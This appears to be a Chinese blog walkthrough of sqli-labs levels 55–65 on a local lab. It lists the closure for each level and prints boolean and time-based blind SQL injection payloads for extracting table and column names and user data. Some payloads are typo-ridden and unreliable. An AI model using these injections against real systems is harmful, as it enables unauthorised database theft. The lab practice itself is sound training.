sql lab (续)

本文讲述了在less-55到less-65的SQL注入挑战中,逐步尝试不同的闭合方法,如substr函数和布尔/时间盲注,以探测security和users表的信息,以及列名。作者使用burp工具进行爆破并测试表名和列的具体内容。
摘要由CSDN通过智能技术生成

less-55

这题有14次试的机会

前面失误了几次,第13次才试出闭合是 )   无妨,次数到了刷新就好了

less-56

这题和上一题差不多,闭合的区别 ')

less-57

还是闭合的区别,"闭合

less-58

无回显,不能用显错注入方式,只有五次注入机会,用盲注也不太现实,所以试试报错注入

less-59

试了很多次,后来才发现原来没有闭合

less-60

闭合方式 "),其余也都一样

less-61

闭合方式 '))  套路都一样

less-62

闭合 ')

不能用上面的两种方式,试试盲注

长度为10

第一个字母为c

一个一个猜很麻烦,我们可以用burp爆破

利用substr函数依次往后面猜解

判断security库下的所有表

http://127.0.0.1/sql-labs/Less-62/?id=1') and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='a'--+

判断users表下的字段

http://127.0.0.1/sql-labs/Less-62/?id=1') and substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='a'--+

判断username字段下的值

less-63

和上一题一样,闭合的区别 '

less-64

也是闭合的区别, ))

less-65

")闭合,都一样

一样的套路:

")and length((select table name from information_schema.tables where table_ schema=database()))>1 --+ (布尔盲注得出表长度)
")and if(lenath((select table name from information_schema.tables where table_ schema=database()))>1,seep(5),1)--+(时间盲注得出表长度)
")and if(substr/(select table_name from information schema.tables where table_ schema=database()),1,1)=a,sleep(5),1)--+(判断表的具体字符串)
")and if(substr((select column name from information schema.columns where table_ schema=database() and table_name=上面查询出来的表),1,1)=a',sleep(5),1)--+ (判断列的具体字符串)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

迪亚波罗#

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值